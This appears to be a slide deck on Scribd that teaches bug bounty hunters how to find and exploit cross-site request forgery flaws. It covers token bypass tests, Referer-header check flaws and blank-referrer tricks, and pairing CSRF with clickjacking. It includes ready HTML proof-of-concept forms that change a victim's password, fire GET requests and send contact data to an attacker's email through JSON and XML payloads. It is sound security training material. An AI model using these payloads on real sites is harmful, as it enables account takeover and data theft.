Scribd
Upload
44 views17 pages

CSRF Bug Hunting Methodology Guide

Uploaded by

M P
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
44 views17 pages

CSRF Bug Hunting Methodology Guide

Uploaded by

M P
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

CSRF Bug Hunting

Methodology

Become a Successful
Bug Bounty Hunter

This presentation uses a free template provided by [Link]


[Link]
CSRF - Basics
• Logged in user clicks & visits your code
• Bad actions done on behalf of users
• Changing email (ATO)
• Updating account information
• Updating shipping information

This presentation uses a free template provided by [Link]


[Link]
CSRF - Protection
CSRF protection:
The idea is to stop a request from
[Link] from being submitted secretly to
do bad things in the account on [Link]

This presentation uses a free template provided by [Link]


[Link]
CSRF - Approach
• Look for missing CSRF tokens!
• Check authenticated functions
• Not interesting for contact form
• State changing actions to be protected
• Account updates, profile updates etc.

This presentation uses a free template provided by [Link]


[Link]
CSRF - Approach
• Get into developer thoughts
• If they miss CSRF security…
• …they might missed other things too!
• Even if there is a CSRF token
• Chances are they can be bypassed!

This presentation uses a free template provided by [Link]


[Link]
CSRF - Tests
• Sending blank CSRF token
• Delete CSRF token parameter
• Change request method (POST to GET)
• Sharing CSRF tokens between accounts
• Changing 1 character of the token

This presentation uses a free template provided by [Link]


[Link]
CSRF - Referer
• Often Referrer Header is used
• Ref. Header set to [Link]
• If set – verified
• If other value - fail

This presentation uses a free template provided by [Link]


[Link]
CSRF - Referer
• Referer Header Flaw 1
Some Web Apps only verify if their
domain is part of the Ref. Header

Bypass:
[Link]

This presentation uses a free template provided by [Link]


[Link]
CSRF - Referer
• Referer Header Flaw 2
Some Web Apps only verify that the
Ref. Header starts with their domain

Bypass:
[Link]

This presentation uses a free template provided by [Link]


[Link]
CSRF - Referer
• Referer Header Flaw 3
Some Web Apps don’t verify the Ref.
Header if it’s a blank header
Bypasses with blank Referer:
<meta name="referrer" content="no-referrer" />
<iframe src=”data:text/html;base64,form_code_here”>

Blank Referer and blank origin:


<iframe src=data:text/html;base64,BASE64PAYLOAD>

This presentation uses a free template provided by [Link]


[Link]
CSRF – No protection
• Example of no CSRF protection
<html>
<body>
<form action="[Link]
method="POST">
<input type="hidden" name="newpassword" value="oops" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

This presentation uses a free template provided by [Link]


[Link]
CSRF – with Clickjacking
• CSRF with Clickjacking
• X-FRAME-OPTIONS missing -> Clickjack
• Send blank CSRF token
• Error thrown – but data reflected!
• Requires Clickjacking to submit
reflected data!

This presentation uses a free template provided by [Link]


[Link]
CSRF – with GET method
• When GET method is supported
• CSRF token not used
• Sample Payload
<img src='[Link]

This presentation uses a free template provided by [Link]


[Link]
CSRF – in XML
• CSRF XML
<html>
<body>
<form ENCTYPE="text/plain" action="[Link]
method="post">
<input type="hidden" name="<foo> <html
xmlns:html='[Link] <html:script>alert(1);</html:script>
</html> </foo>">
<input type="submit" value="submit"> </form>
</body>
</html>

This presentation uses a free template provided by [Link]


[Link]
CSRF – in JSON
• CSRF JSON
• More challenging
• Cannot end in =
• Need to smuggle =
• Email to myemail+2=@[Link]
• Is going to myemail@[Link]

This presentation uses a free template provided by [Link]


[Link]
CSRF – in JSON
• CSRF JSON
<html>
<body>
<form ENCTYPE="text/plain" action="[Link] method="post">
<input type="hidden"
name="{"params":{"limit":20,"and":false,"filters":[],"excluded_contacts":[]},"fields":["First
Name","Last Name","Email
Address","Title","Notes","Organization","Street","City","State","Tags","Zip Code","Phone
Number","Gender","Event ID","Event Title","VIP","Twitter Handle","Twitter URL","Twitter
Followers","Twitter Following","Facebook Name","Facebook URL","Facebook Friends","Instagram
Handle","Instagram URL","Instagram Followers","Instagram Following","Website","Date
Added","Unsubscribed"],"recipient":"myemail+2" value='@[Link]'>
<input type="submit" value="submit"> </form>
</body>
</html>

This presentation uses a free template provided by [Link]


[Link]
Thank You!

Become a Successful
Bug Bounty Hunter

This presentation uses a free template provided by [Link]


[Link]

You might also like